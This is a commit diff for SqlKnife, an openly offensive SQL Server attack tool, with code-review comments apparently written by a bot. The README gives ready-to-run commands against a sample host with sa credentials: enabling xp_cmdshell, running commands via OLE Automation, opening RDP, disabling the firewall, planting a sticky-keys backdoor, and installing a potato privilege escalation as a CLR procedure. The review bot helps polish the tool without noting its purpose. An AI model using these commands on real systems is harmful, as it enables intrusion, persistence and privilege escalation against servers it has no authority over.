
Commit 6c0444d

Backslash bug explanation; updated images
2 parents 252ad16 + 022a67a commit 6c0444d

16 files changed, +79 -25 lines changed

PotatoInSQL/PotatoInSQL.sqlproj

+1-1
@@ -16,7 +16,7 @@
1616
<ModelCollation>1033, CI</ModelCollation>
1717
<DefaultFileStructure>BySchemaAndSchemaType</DefaultFileStructure>
1818
<DeployToDatabase>True</DeployToDatabase>
19-
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
19+
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
2020
<TargetLanguage>CS</TargetLanguage>
2121
<AppDesignerFolder>Properties</AppDesignerFolder>
2222
<SqlServerVerification>False</SqlServerVerification>
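Review bot: the target framework moves from v3.5 to v4.0 in this hunk, but the README changed in the same commit introduces a `--3/--4` switch that promises a .NET 3.5 payload; with a single `<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>` the project can only build one of the two, so either add a second build configuration for v3.5 or state in the README which assembly `--3` actually ships. A CLR assembly built for the wrong runtime (SQL Server 2005-2008 R2 host CLR 2.0, 2012 and later host CLR 4) simply fails to load on the server, which is hard to diagnose from the client side, so this is worth a line in the commit message as well.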

PotatoInSQL/Program.cs

+2-2
@@ -53,8 +53,8 @@ public static void OriginMain(string cmd)
5353

5454
string clsId = "4991D34B-80A1-4291-83B6-3328366B9097";
5555
ushort port = 6666;
56-
//string program = @"c:\Windows\System32\cmd.exe";
57-
string program = @"sqlps.exe";
56+
string program = @"c:\Windows\System32\cmd.exe";
57+
//string program = @"sqlps.exe";
5858
string programArgs = null;
5959
ExecutionMethod executionMethod = ExecutionMethod.Auto;
6060
bool showHelp = false;
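Review bot: the default `program` is changed by swapping which of two lines is commented out (`//string program = @"sqlps.exe";` versus `string program = @"c:\Windows\System32\cmd.exe";`); changing behaviour by editing source is fragile, so expose the choice as a command-line option next to `programArgs` and keep both candidates consistently either fully qualified or bare (one is a full path, the other is not). The fixed `clsId` and `port = 6666` stay hard-coded in the same block; at minimum document them in the README so whoever builds and runs this knows what the component registers and which port it uses.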

README.md

+62-6
@@ -1,10 +1,11 @@
1-
# bSqlKnife
1+
# SqlKnife
22

33
适合在命令行中使用的轻巧的SQL Server数据库攻击工具。
44

5-
65
## 参数说明
76

7+
![](img/Snipaste_2021-08-03_10-43-27.png)
8+
89
```
910
<-H host> <-P port> <-u username> <-p password> <-D dbname> <--openrdp> <--shift> <--disfw> <--xpcmd> <--oacreate> <--dbup> <--fix> <--remove> <--3/--4>
1011
```
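Review bot: the newly referenced image `img/Snipaste_2021-08-03_10-43-27.png` is not among the files this commit adds (the added screenshots start at `11-17-47`), so confirm it already exists in the repository or the link will render broken; the `![]()` form also leaves the alt text empty, so give it a short description of what the screenshot shows. The rename from `# bSqlKnife` to `# SqlKnife` is fine as is.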
@@ -21,7 +22,7 @@
2122

2223
-c 要执行的命令
2324

24-
--openrdp 开启目标远程桌面
25+
--openrdp 开启目标远程桌面并读取当前远程桌面端口号
2526

2627
--shift 创建shfit后门
2728

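Review bot: the `--openrdp` description now also promises to read the current remote-desktop port, but the unchanged context line below still reads `--shift 创建shfit后门` with the typo `shfit`; fix it while this block is being touched. The later hunk states that these options are registry operations that need sufficient privilege, so say so here too, so the parameter list is self-contained.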
@@ -45,14 +46,22 @@
4546

4647
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --fix
4748

49+
![](img/Snipaste_2021-08-03_10-46-08.png)
50+
51+
![Snipaste_2021-08-03_10-46-29](img/Snipaste_2021-08-03_10-46-29.png)
52+
4853
#### 执行命令
4954

5055
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd -c whoami
5156

57+
![Snipaste_2021-08-03_10-47-04](img/Snipaste_2021-08-03_10-47-04.png)
58+
5259
#### 禁用xp_cmdshell
5360

5461
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
5562

63+
![Snipaste_2021-08-03_10-47-56](img/Snipaste_2021-08-03_10-47-56.png)
64+
5665

5766
### 使用Ole Automation Procedures执行命令
5867

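Review bot: alt text is inconsistent in this hunk: `![](img/Snipaste_2021-08-03_10-46-08.png)` has none while the next three use the file name as alt text; use a short description of what each screenshot shows (for example the result of `--xpcmd --fix`) so the README stays readable when the images do not load. None of these `10-4x` screenshots are in this commit's file list either, so verify that they resolve.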
@@ -62,27 +71,74 @@ SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --xpcmd --remove
6271

6372
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate --fix
6473

74+
![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
75+
6576
#### 执行程序
6677

67-
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate -c calc.exe
78+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --oacreate -c calc.exe
79+
80+
![Snipaste_2021-08-03_10-55-46](img/Snipaste_2021-08-03_10-55-46.png)
81+
82+
![Snipaste_2021-08-03_10-56-34](img/Snipaste_2021-08-03_10-56-34.png)
6883

6984
### 开RDP,关防火墙加规则(开RDP时自动加),装shift后门
7085

71-
基于注册表操作
86+
权限足够的前提下,基于注册表的操作
87+
88+
#### 开启RDP
89+
90+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --openrdp
91+
92+
![Snipaste_2021-08-03_11-36-43](img/Snipaste_2021-08-03_11-36-43.png)
93+
94+
![Snipaste_2021-08-03_11-36-57](img/Snipaste_2021-08-03_11-36-57.png)
95+
96+
#### 关防火墙
7297

98+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --disfw
7399

100+
(可能不好用,可能是因为注册表位置参考windows10的原因)
74101

102+
![Snipaste_2021-08-03_11-42-58](img/Snipaste_2021-08-03_11-42-58.png)
75103

104+
#### 装shift后门
105+
106+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --shift
107+
108+
![Snipaste_2021-08-03_11-45-54](img/Snipaste_2021-08-03_11-45-54.png)
109+
110+
![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
76111

77112
### PotatoInSQL(--dbup)
78113
将土豆提权作为存储过程安装到数据库,然后调用。
79114

115+
#### 安装.net3.5版本的potatoinsql
116+
117+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup --fix --3
118+
119+
![Snipaste_2021-08-03_11-17-47](img/Snipaste_2021-08-03_11-17-47.png)
120+
121+
![Snipaste_2021-08-03_11-18-02](img/Snipaste_2021-08-03_11-18-02.png)
122+
80123

81124

125+
#### 利用土豆执行命令
126+
127+
SqlKnife.exe -H 192.168.49.143 -P 1433 -u sa -p admin@123 --dbup -c whoami
128+
129+
![Snipaste_2021-08-03_11-28-46](img/Snipaste_2021-08-03_11-28-46.png)
130+
131+
![Snipaste_2021-08-03_11-29-11](img/Snipaste_2021-08-03_11-29-11.png)
132+
82133
### 启用/还原配置功能
134+
135+
![Snipaste_2021-08-03_11-29-35](img/Snipaste_2021-08-03_11-29-35.png)
136+
83137
做完操作之后把配置和CLR程序集清理掉。
84138

85139
--fix参数和--remove参数只涉及--xpcmd、--oacreate、--clrcmd、--clrdexec、--dbup
86140

87141

88-
### 指定不同版本clr的payload
142+
### 指定不同版本clr的payload
143+
144+
--3/--4 如果不加这个参数,默认是.net4版本的payload
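Review bot: two screenshots are reused where a different one was probably intended: `img/Snipaste_2021-08-03_10-55-46.png` appears both after `--oacreate --fix` and after `--oacreate -c calc.exe`, and `img/Snipaste_2021-08-03_11-29-11.png` appears both after `--shift` and after `--dbup -c whoami`, while `img/Snipaste_2021-08-03_11-19-41.png` and `img/Snipaste_2021-08-03_11-46-53.png` are added by this commit but never referenced, so check the pairing. Two smaller points: the `--disfw` caveat says the registry location follows Windows 10, so state which Windows versions were actually tested rather than "may not work"; and under `### 启用/还原配置功能` the image is inserted between the heading and its explanatory sentence, which reads better after the sentence. The final `-`/`+` pair for `### 指定不同版本clr的payload` is identical in the rendered view, presumably a whitespace-only change.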

SqlKnife/MsSqlExploit.cpp

+12-13

Added images:

img/Snipaste_2021-08-03_11-17-47.png (5.54 KB)
img/Snipaste_2021-08-03_11-18-02.png (2.33 KB)
img/Snipaste_2021-08-03_11-19-41.png (3.15 KB)
img/Snipaste_2021-08-03_11-28-46.png (10.6 KB)
img/Snipaste_2021-08-03_11-29-11.png (3.11 KB)
img/Snipaste_2021-08-03_11-29-35.png (5.61 KB)
img/Snipaste_2021-08-03_11-36-43.png (3.88 KB)
img/Snipaste_2021-08-03_11-36-57.png (3.57 KB)
img/Snipaste_2021-08-03_11-42-58.png (2.99 KB)
img/Snipaste_2021-08-03_11-45-54.png (2.92 KB)
img/Snipaste_2021-08-03_11-46-53.png (257 KB)

sqltool.py

+2-3
